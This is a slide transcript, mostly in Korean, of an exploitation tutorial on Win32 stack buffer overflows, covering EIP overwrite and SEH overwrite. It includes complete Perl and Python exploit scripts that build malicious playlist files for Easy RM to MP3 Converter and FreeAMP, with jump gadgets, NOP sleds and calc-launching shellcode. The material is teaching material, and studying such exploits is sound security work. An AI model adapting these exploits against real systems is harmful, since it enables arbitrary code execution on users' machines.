system hacking tutorial #2 - buffer overflow - overwrite eip
TRANSCRIPT
System Hacking & Reverse Engineering
documented by h2spice [email protected]
[ Buffer Overflow - Overwrite EIP ]
Who am I
Sanghwan,Ahn (h2spice)
Works for LINE.Corp
Carrying out research on the vulnerability (exploitation,hunt,analysis)
시스템 해킹 / 리버싱
취약점 원리
Buffer Overflow
Format String Bug
Stack Overflow
Use After Free
Heap Overflow
Heap Overflow
익스플로잇(Win32/*NIX/ARM)
Overwriting RET
Egg Hunting
Overwriting SEH
RTL
ROP
Heap Spraying
취약점 / 악성코드 분석
악성코드 분석
버그 헌팅
X86 ARM
취약점 분석
Software on X86
Mobile
소스코드 분석
퍼징
CVE-XXXX-XXXX
Exploit-DBInj3ct0r - 1337day
리버스 엔지니어링
iOS
Android
커리큘럼 소개
Overwriting .dtors
Overwriting GOT
목차커리큘럼 소개
Track3 - Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP
Heap Spray
Track3-2 *NIX
Overwrite RET
RTL
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
RTL
ROP
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
What is the Exploitation ?
익스플로잇 (Exploitation) 이란, 컴퓨터 의 소프트웨어 나 하드웨어 및 컴퓨터 고나련 전자 제품의 버그, 보안 취약점등 설계상의 결함을 이용해 공격자의 의도된 동작을 수행하도록 만들어진 절차나 일련의 명령, 스크립트, 프로그램 또는 특정한 데이터 조각을 말하며, 이러한 것들을 사용한 공격 행위를 의미
공격자가 타깃의 흐름 제어가 (Control Flow) 가능 할 때 부터 진행
보통 특정 버그를 이용하여 취약성을 유발하는 코드와 특정 보안 메커니즘을 우회하는 코드, 악의적인 동작을 수행하는 코드로 구성
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Overwrite RET (Retrun Address)스택 버퍼 오버플로우 (Stack Buffer Overflow) 취약성을 이용하여 스택 영역에 할당된 버퍼의 크기를 초과하는 데이터(공격코드 포함)를 기록하여 저장된 복구 주소(Return Address)를 공격코드의 주소로 변경함으로써 임의의 코드를 실행
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
How do you fly to shellcode ?셸 코드(Shell Code)로 이동하는 방법
jmp(or call) [register]: 셸 코드를 가리키는 주소를 레지스터에 넣고, 그 주소를 Return Address에 넣어 셸 코드를 로드할 수 있다.
pop return : 셸 코드를 가리키는 주소를 스택에 넣어 놓고 pop/ret 또는 pop/pop/ret (해당 명령이 스택의 어느 위치에 존재하느냐에 따라 pop의 개수가 달라진다)와 같은 명령을 EIP로 주입함으로써 쉘 코드를 로드 할 수 있다.
push return: ‘jmp(or call) [register]’ 와 유사하다. 만약 공격자가 어디에서도 ‘jmp(or call) [register]’ 기계어를 찾을 수 없다면 스택에 주소를 푸쉬(push)하고 ret 처리하여 셸 코드를 로드할 수 있다.
jmp [register + offset]: 셸 코드를 포함하는 버퍼를 가르키는 레지스터가 있지만, 그것이 셸 코드의 시작 위치를 가리키지 않는다면, 공격자는 레지스터로 가기 위해 필요한 바이트의 덧셈 연산을 하고 jmp [register + offset] 기계어를 통해 셸 코드를 로드할 수 있다.
SEH (Error Handler): 모든 소프트웨어는 OS에 의해 제공되는 예외 처리기를 기본적으로 가지고 있다. 그래서 만약 소프트웨어 자신이 예외 처리를 사용하지 않는다 하더라도, 공격자는 SEH 핸들러를 자신이 원하는 주소로 덮어 씌워, 셸 코드를 로드할 수 있다.
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Overwrite RETarg2
arg1
&ret (saved eip)
saved ebp
char buf[8]
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Overwrite RETarg2
arg1
&ret (saved eip)
saved ebp
char buf[8]
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
l l e H
\n w o
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Overwrite RETarg2
arg1
&ret (saved eip)
saved ebp
char buf[8]
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
A A A A
A A A A
A A A A
A A A A
A A A A
A A A A
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Overwrite RETarg2
arg1
&ret (saved eip)
saved ebp
char buf[8]
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
A A A A
A A A A
A A A A
A A A A
A A A A
Target Address (to Shell Code)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Overwrite RETarg2
arg1
&ret (saved eip)
saved ebp
char buf[8]
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
S h e l lC o d e
&buf(included shell code)
Padding
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DTarget Info
Win32
Easy RM to MP3 Converter
v.2.7.3.700
Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DTip
Generate Pattern by using mona plugin (!mona pattern_create 30000)
nop sleds (0x90 * N)
Shell code (windows/exec calc.exe)
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DExploit Info
.m3u Playlist File Format
length of junk data is 26037
gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DExploit Code (exploit.pl)
my $file= "exploit.m3u";
my $junk= "A" x 26037; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $shellcode = "\x90" x 25;
# windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc $shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";
open($FILE,">$file"); print $FILE $junk.$eip.$shellcode; close($FILE); print "m3u File Created successfully\n";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Overwrite SEH (Error Handler)구조적 예외 처리 핸들러(SEH:Structured Exception Handler)
윈도우에서 제공하는 예외 처리 방식
exeception handler 사용
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exception Handler
예외 핸들러(Exception Handler)는 애플리케이션의 예외 발생에 대처하는 목적을 가진 애플리케이션 내부 조각들을 의미한다(일반적인 예외 처리 메커니즘은 아래 참고)
try { // run stuff. if an exception occurs, go to <catch> code }
catch { // run stuff when exception occurs }
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exception Handler
high address
Exception Handler
ArgumentsReturn Address
Stack Frame PointerLocal Variables
(buffer area)low address
try { // run stuff. if an exception occurs, go to <catch> code }
catch { // run stuff when exception occurs }
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
예외 핸들러 (Exception Handler) 는 두가지 포인터를 가진다 다음 Exception Handler 구조체를 가리키는 포인터
예외 핸들러의 실제 주소를 가리키는 포인터 (SE Handler)
Exception Handler
high address
Exception Handler
ArgumentsReturn Address
Stack Frame PointerLocal Variables
(buffer area)low address
Exception Handler
Next Exception Handler Address
Exception Handler Address
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exception HandlerException Handler #1
Next Exception Handler AddressException Handler Address
Exception Handler #2Next Exception Handler Address
Exception Handler Address
Exception Handler #3Next Exception Handler Address
Exception Handler Address
MSVCRT! exhandler0xFFFFFFFF
Exception Handler Address
Occurs Exception
Terminated
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
high address
pointer to next SEH record
pointer to SEH Handler
ArgumentsReturn Address
Stack Frame Pointer
Local Variables (buffer area)
low address
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
Overwrite SEHTrack3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
high address
pointer to next SEH record
pointer to SEH Handler
ArgumentsReturn Address
Stack Frame Pointer
Local Variables (buffer area)
low address
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
A A A A
A A A A
Overwrite SEHTrack3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
high address
pointer to next SEH record
pointer to SEH Handler
ArgumentsReturn Address
Stack Frame Pointer
Local Variables (buffer area)
low address
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
A A A A
A A A A
A A A A
A A A A
A A A A
A A A A
A A A A
Overwrite SEHTrack3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
high address
pointer to next SEH record
pointer to SEH Handler
ArgumentsReturn Address
Stack Frame Pointer
Local Variables (buffer area)
low address
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
A A A A
A A A A
A A A A
A A A A
A A A A
A A A A
A A A A
Overwrite SEHTrack3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Overwrite SEHhigh address
pointer to next SEH record
pointer to SEH Handler
ArgumentsReturn Address
Stack Frame Pointer
Local Variables (buffer area)
low address
Calling .Start function:.Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret
Writing Direction
A A A A
A A A A
A A A A
pop/pop/ret
jmp to shellcode
S h e l l
PaddingC o d e
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DTarget Info
Win32
FreeAMP Audio Player
v.2.0.7
Download Link is (http://outofcontrol.co.kr/vulnApp/FreeAmp.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DTip
Generate Pattern by using mona plugin (!mona pattern_create 30000 / !mona seh)
nop sleds (0x90 * N)
Shell code (windows/exec calc.exe)
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DExploit Info
.pls Playlist File Format
length of junk data is 893
gadget is 0x004027BF (Pop/Pop/Ret From freeamp.exe)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DExploit Code (exploit.py)
#!/usr/bin/python from struct import pack from time import sleep print ''' FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit by h2spice ''' # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc shellcode =("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"+ "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"+ "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"+ "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"+ "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"+ "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"+ "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"+ "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"+ "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"+ "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"+ "\x7f\xe8\x7b\xca") buf = ("\x41" * 893) buf += ("\xeb\x08\x90\x90") #nSEH (jmp to shellcode) buf += pack('<L',0x004027BF) #SEH (POP/POP/RETN) buf += ("\x90" * 20) buf += shellcode buf += "\x41" * (30000-len(buf)) exploit = ('''[playlist] File1=http://'''+buf+''' NumberOfEntries=1 Version=2 ''') print "\t\t[+]Creating File Exploit.pls..." sleep(1) try: f = open("Exploit.pls","wb") f.write(exploit) f.close() print "\t\t[+]File Exploit.pls Created." sleep(2) except: print "\t\t[-]Error in Create file Exploit.pls" sleep(1)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)